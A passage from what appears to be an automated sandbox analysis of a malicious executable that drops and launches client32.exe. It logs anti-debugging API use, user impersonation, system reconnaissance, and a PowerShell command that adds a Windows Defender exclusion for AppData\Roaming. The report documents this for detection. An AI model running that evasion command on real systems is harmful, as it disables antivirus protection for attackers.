                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE00762126 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FFE00762126
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE013CB20C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FFE013CB20C
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE1030A0C0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00007FFE1030A0C0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE1030A9E8 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FFE1030A9E8
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE1151406C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00007FFE1151406C
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE1151462C IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FFE1151462C
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE11EA30A4 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FFE11EA30A4
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE11EA2670 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00007FFE11EA2670
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE11ED25FC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00007FFE11ED25FC
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE11ED2BAC IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FFE11ED2BAC
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE126E382C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00007FFE126E382C
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE126E3DEC IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FFE126E3DEC
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE12E13C00 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00007FFE12E13C00
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE12E141C0 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FFE12E141C0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE130C14EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00007FFE130C14EC
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE130C1AAC IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FFE130C1AAC
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE13201AEC IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FFE13201AEC
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE1320152C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00007FFE1320152C
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE1321A060 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00007FFE1321A060
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE1321AA94 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FFE1321AA94
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE13306290 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FFE13306290
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE13305CFC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00007FFE13305CFC
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE148E52F0 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FFE148E52F0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE148E4D20 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00007FFE148E4D20
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE1A460AA8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00007FFE1A460AA8
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C355E25 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_6C355E25
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C34FF11 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_6C34FF11
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C5DADFC _crt_debugger_hook,_memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,6_2_6C5DADFC
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C560807 __report_gsfailure,IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,6_2_6C560807
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C5DC16F __report_gsfailure,IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,6_2_6C5DC16F

                                HIPS / PFW / Operating System Protection Evasion

                                barindex
                                Adds a directory exclusion to Windows Defender
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'"
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'"Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C339500 LogonUserA,ImpersonateLoggedOnUser,GetProcAddress,GetProcAddress,GetProcAddress,GetLastError,GetLastError,GetLastError,GetDesktopWindow,SetLastError,SetLastError,SetLastError,GetLastError,GetProcAddress,SetLastError,LoadLibraryA,GetProcAddress,GetDesktopWindow,FreeLibrary,wsprintfA,RevertToSelf,CloseHandle,6_2_6C339500
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeProcess created: C:\Users\user\Desktop\BUenB12U2a.exe "C:\Users\user\Desktop\BUenB12U2a.exe"Jump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'"Jump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"Jump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get nameJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\extracted\client32.exe C:\Users\user\AppData\Roaming\extracted\client32.exeJump to behavior
                                Source: BUenB12U2a.exe, 00000001.00000003.1801257189.00000210120E6000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1799989658.00000210118E1000.00000004.00000020.00020000.00000000.sdmp, client32.exeBinary or memory string: Shell_TrayWnd
                                Source: BUenB12U2a.exe, 00000001.00000003.1801257189.00000210120E6000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1799989658.00000210118E1000.00000004.00000020.00020000.00000000.sdmp, client32.exeBinary or memory string: Progman
                                Source: BUenB12U2a.exe, 00000001.00000003.1801257189.00000210120E6000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1799989658.00000210118E1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Shell_TrayWndTraceRunpluginTimeoutP$
                                Source: BUenB12U2a.exe, 00000001.00000003.1801257189.00000210120E6000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1799989658.00000210118E1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progman|
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF748B195E0 cpuid 0_2_00007FF748B195E0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: GetLocaleInfoW,1_2_00007FFE013573A0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: GetLocaleInfoW,GetLocaleInfoW,1_2_00007FFE01343440
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: EnterCriticalSection,EnumSystemLocalesW,LeaveCriticalSection,1_2_00007FFE013D64C0
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: EnumSystemLocalesA,6_2_1070B4E7
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: EnumSystemLocalesA,6_2_1070B4E8
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: EnumSystemLocalesA,6_2_1070B14A
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,MultiByteToWideChar,6_2_1070E5F1
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: GetLocaleInfoA,6_2_1070B6DC
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: GetLocaleInfoA,MultiByteToWideChar,6_2_1070E6AE
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: GetLocaleInfoA,IsValidCodePage,IsValidLocale,6_2_1070AF75
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,6_2_1070E704
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: EnumSystemLocalesA,6_2_1070B3D5
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: GetLocaleInfoW,WideCharToMultiByte,6_2_1070E7C7
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,6_2_6C35F80C
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,6_2_6C35F848
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,6_2_6C35F48D
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,6_2_6C35F4E8
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,6_2_6C35F6B9
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,6_2_6C35F7A5
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: EnumSystemLocalesA,6_2_6C35F781
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,6_2_6C36B1AC
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,6_2_6C36B286
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,6_2_6C35F2F1
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: GetLocaleInfoA,6_2_6C36B2C9
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,6_2_6C35F3E6
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: GetLocaleInfoW,free,_calloc_crt,strncpy_s,GetLocaleInfoW,GetLocaleInfoW,_calloc_crt,GetLocaleInfoW,GetLastError,_calloc_crt,free,free,__invoke_watson,6_2_6C56888A
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: _getptd,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_itoa_s,__fassign,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,strcpy_s,__invoke_watson,6_2_6C568468
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: GetLocaleInfoA,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,_errno,6_2_6C5665F0
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: GetLocaleInfoW,strcmp,strcmp,GetLocaleInfoW,atol,GetACP,6_2_6C5685AC
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,_freea_s,malloc,6_2_6C56871C
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,6_2_6C5DF42E
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74282\PIL VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74282\PIL VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74282\PIL VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74282\PIL VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74282\certifi VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74282\cryptography-44.0.0.dist-info VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74282\cryptography-44.0.0.dist-info VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74282\cryptography-44.0.0.dist-info VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74282\cryptography-44.0.0.dist-info VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74282\cryptography-44.0.0.dist-info VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74282\cryptography-44.0.0.dist-info\licenses VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74282\cryptography-44.0.0.dist-info VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74282\ucrtbase.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74282 VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74282 VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74282 VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74282 VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74282 VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74282\_ctypes.pyd VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74282 VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-core-console-l1-1-0.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-core-datetime-l1-1-0.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-core-debug-l1-1-0.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-core-errorhandling-l1-1-0.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-core-fibers-l1-1-0.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-core-fibers-l1-1-1.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-core-file-l1-1-0.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-core-file-l1-2-0.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-core-handle-l1-1-0.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-core-interlocked-l1-1-0.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-core-memory-l1-1-0.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-core-namedpipe-l1-1-0.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-core-processenvironment-l1-1-0.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-core-timezone-l1-1-0.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-crt-environment-l1-1-0.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-crt-heap-l1-1-0.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-crt-utility-l1-1-0.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74282\cryptography-44.0.0.dist-info VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74282\base_library.zip VolumeInformationJump to behavior
